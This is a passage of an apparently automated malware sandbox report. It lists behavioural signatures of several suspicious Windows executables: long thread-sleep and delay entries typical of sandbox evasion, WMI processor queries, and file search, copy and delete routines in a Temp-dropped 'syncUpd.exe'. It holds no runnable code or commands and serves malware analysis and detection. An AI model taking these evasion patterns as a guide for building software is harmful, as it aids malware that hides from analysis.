                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -579375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -578844s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -578359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -577797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -577109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -576531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -576281s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -575015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574734s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -574188s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573904s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573648s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -573358s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572941s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572634s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -572276s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571901s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571540s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -571252s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -570621s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -569433s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567786s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567430s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -567022s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566808s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566377s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -566059s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -565580s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -565013s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -564318s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -563781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -563375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -562136s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -561159s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -560511s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559868s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559543s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -559278s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558825s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558612s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -558271s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557957s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557511s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -557172s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556925s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556480s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -556177s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555870s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555625s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555435s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -555128s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -554852s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -554123s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -553836s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -553532s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550943s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550615s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -550254s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549815s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549415s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -549082s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548720s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548348s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -548105s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547885s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547686s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547497s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547279s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547168s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -547042s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546933s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546744s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546608s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546423s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546268s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -546085s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545920s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545739s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545568s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545414s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545280s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545163s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -545020s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544883s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544717s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544513s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544311s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544190s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -544059s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543855s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543693s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543545s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543413s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543228s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -543092s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542952s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542810s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542668s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542559s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542427s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542307s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -542044s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541732s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541597s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541334s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541220s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -541092s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540945s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540829s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540715s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540601s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540476s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540348s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540224s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -540104s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539942s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539804s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539683s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539445s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539336s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539229s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -539114s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538990s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538848s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538726s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538608s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538481s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538355s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538241s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -538119s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537996s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537859s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537752s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537638s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537507s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 44604Thread sleep time: -537390s >= -30000s
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe TID: 44976Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep count: 9401 > 30
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep time: -94010000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep count: 595 > 30
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exe TID: 10968Thread sleep time: -5950000s >= -30000s
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00408123 FindFirstFileA,FindClose,13_2_00408123
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,13_2_004085B8
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040342B FindFirstFileA,13_2_0040342B
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00403432 FindFirstFileA,14_2_00403432
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00408123 FindFirstFileA,FindClose,14_2_00408123
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_004085B8
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_0040D540
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_00412570
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_0040D1C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_004015C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_004121F0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_00411650
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_0040B610
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_0040DB60
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00411B80
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_009018B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_009018B7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008F1827
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_008FD427
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00902457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_00902457
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_008FB877
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_008FDDC7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00901DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00901DE7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008FD7A7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_009027D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_009027D7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00401120 GetSystemInfo,ExitProcess,15_2_00401120
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99521Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99357Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99217Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 99031Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98918Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98812Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98703Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98586Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98469Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98328Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98197Jump to behavior
